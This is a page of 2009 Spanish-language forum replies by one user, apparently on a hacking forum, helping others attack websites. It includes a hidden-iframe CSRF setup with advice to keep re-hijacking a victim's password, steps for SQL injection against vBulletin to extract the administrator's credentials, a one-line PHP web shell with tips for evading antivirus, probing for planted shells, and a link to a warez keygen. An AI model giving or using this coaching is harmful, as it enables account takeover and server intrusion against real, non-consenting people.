Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#3451
Nivel Web / Re: [Problema] XSRF
6 Diciembre 2009, 21:14 PM
Código (html4strict) [Seleccionar]
Lo se quea aca
<iframe src="xss.html" style="width: 1px;"></iframe>


Después en xss.html pones tu formulario.
#3452
Nivel Web / Re: Alguna vulnerabilidad en VBulletin?
6 Diciembre 2009, 21:12 PM
Lo que sucede esque
.com.ar/foros/faq.php?s=&do=search&q=' union select '1&match=any&titlesonly=0
está mal porque como sabes si la tabla tiene una sola columna o no, eso debería darte error.

http://www.programaswarez.com/descargar-scripts-gratis/4294-descargar-vbulletin-3-7-0-gold-vbulletin-blog-1-05-keygen-free-download.html
#3453
Nivel Web / Re: Argument Injection - Basic
6 Diciembre 2009, 20:40 PM
Register Globals en php hace que $variable pueda ser modificado con test.php?variable= asi que practicamente todos los sistemas de acceso son vulnerables xD por eso se recomienda siempre tenerlo desactivado.
#3454
Nivel Web / Re: Alguna vulnerabilidad en VBulletin?
6 Diciembre 2009, 20:37 PM
Ese error significa que intentaste hacer una inyección SQL pero quedó mal hecha por lo tanto la query quedó corrupta y te devolvió un error.

Eso significa que si es vulnerable a inyección SQL.

Cuando dicen:
http://www.domain.com/vBulletin/faq.php?s=&do=search&q=[Sqlinjection]&match=any&titlesonly=1

Significa que donde dice "[Sqlinjection]" debes reemplazarlo por tu inyección SQL, o sea... vas probando con el famoso ' order by 99, despues el union select 12345... etc etc y despues vas sacando los accesos de la columna de usuario donde generalmente el primer id válido de la tabla es el administrador.
#3455
Nivel Web / Re: [Problema] XSRF
6 Diciembre 2009, 20:34 PM
Hola, una petición POST no es igual a una petición GET por lo tanto si el formulario solicita una petición post no puedes enviarle una petición get a menos que el programador haya decidido tomar las variables de get y pasarlas a post como lo hace cpanel pero en tu caso no es así, por lo tanto la petición get no te va a resultar.

Si pones tu formulario dentro de una imagen no te va a funcionar tampoco porque el explorador si redireccionará a la persona hacia el formulario pero no lo ejecutará porque las imagenes no ejecutan javascript :P eso solamente sirve para peticiones GET y no POST.

Lo que si puedes hacer es meter tu código dentro de un iframe de 1 pixel de ancho por alto y lo pones dentro de alguna página llamativa y vas probando suertte enviandole la url al afectado.

Si es un foro o algo similar entonces trata de enviarselo a su bandeja de entrada de ese mismo sistema para que te asegures que cuando lo lea estará logueado y el cambio de contraseña hará efecto.

También ojo que si le cambias la contraseña y esa persona sospecha va a ver tu codigo fuente y va a observar tu nueva contraseña y va a recuperar su cuenta :P asi que si yo fuera tu haría un script o algo que verifique el acceso cada 1 minuto y si loguea entonces que vuelva a cambiar la contraseña a una que solo tu sepas y ya.
#3456
Nivel Web / Re: Ayuda, logear en phpmyadmin
6 Diciembre 2009, 20:27 PM
Hola, los xss nunca pasarán de moda  :P asi que si funcionan todavía y si es asi como dices entonces si puedes ganar el acceso atraves del xss siempre y cuando el administrador no haya cerrado sesión del phpmyadmin.
http://foro.elhacker.net/tutoriales_documentacion/tutorial_ataques_xss-t32042.0.html
#3457
Nivel Web / Re: ataque con escripts de shell
6 Diciembre 2009, 20:24 PM
si
#3458
Nivel Web / Re: Libro
5 Diciembre 2009, 21:53 PM
Li mejor que puedes hacer es instalarte un servidor local e ir porobando ejemplos de codigos y vas aprendiendo en el camino.
#3459
Nivel Web / Re: ataque con escripts de shell
5 Diciembre 2009, 21:52 PM
Si lo quieres hacer desde el navegador entonces busca la shell c99, si el servidor es un windows con antivirus de seguro te lo va a detectar asi que le subes esto:
Código (php) [Seleccionar]
<?php @system($_GET['x']); ?>

Despues le ejecutas cosas como test.php?x=dir y ya.

Esto es posible siempre y cuando en ese servidor esté instalado un servidor web y php, en el caso de que tenga asp con ssi entonces necesitas una shell del tipo para asp.

Si no tiene servidor web entonces utiliza una versión portable de php y se lo dejas corriendo.
#3460
Nivel Web / Re: Ayuda, logear en phpmyadmin
5 Diciembre 2009, 18:32 PM
Si es un app server entonces es medio dificil que puedas explotarlo con un XSS ya que el administrador de seguro debe entrar por 127.0.0.1 y no por su misma ip pública o local dentro de la lan y por políticas de seguridad del explorador no te van a dejar hacer un redireccionamiento de peticiones desde una web externa que sería tu web atacante con el exploit hacia el xss y el servidor atacado que sería 127.0.0.1.

Si le lanzas el XSS hacia su ip pública entonces lo mas probable es que no obtengas nada ya que si el ingresa por 127.0.0.1 entonces sus cookies no van a estar ahí por lo tanto el XSS no te va a servir.

El exploit que seguramente encontraste para phpmyadmin es para una versión desactualizada y por lo general son en base a CSRF o XSS y te topas con el mismo problema que mencioné arriba.

Acá tienes algunos bugs de esa versión de phpmyadmin:
http://www.juniper.net/security/auto/vulnerabilities/vuln28068.html
http://www.juniper.net/security/auto/vulnerabilities/vuln34251.html
http://xforce.iss.net/xforce/xfdb/43846

Pero todas esas necesitas intervención del administrador y todas son basadas en un CSRF incluyendo el SQLI y el XSS asi que no creo que puedas entrar por ese lado y cuando busques vulnerabilidades en google ponlo así:
Citarsoftware version vuln

POor ejemplo yo puse:
Citarphpmyadmin 2.9.0 vuln

Y pude encontrar mas resultados que apuntan a esa version ya que hay muchos mas bugs que en esa versión ya están parchados.

Si es windows como se ve en la captura entonces intenta con una de las cientas de vulnerabilidades que hay para ese sistema operativo, trata de forzar un disclosure y vee que versión de windows está utilizando o prueba un 404 con http://x.x.x.x:80/xxx y abajo debería salir o si no le pasas un nmap y no se te ocurra pasarlo desde windows porque es un desastre xD o si quieres mejor utiliza una virtual y vas probando explotaciones remotas que puedas devolverte una shell y ese tipo de cosas pero ya ese tema pasaría a las manos del foro de bugs y exploits a nivel binario :P.

La otra posibilidad es que intentes ver algún sistema wEB que pueda estar instalado ahi que pueda ser vulnerable, prueba con /smf /joomla /wordpress /test /shell /c99.php /etc etc etc y si encuentras algo trata de ver si puedes entrar por ahi.

También averigua si utiliza sqliteadmin tal como lo hace wamp, si lo encuentras entonces ese sistema se instala o se instalaba por defecto sin contraseña y en ese lugar si te permiten ejecutar código php arbitrario desde sus propias funciones.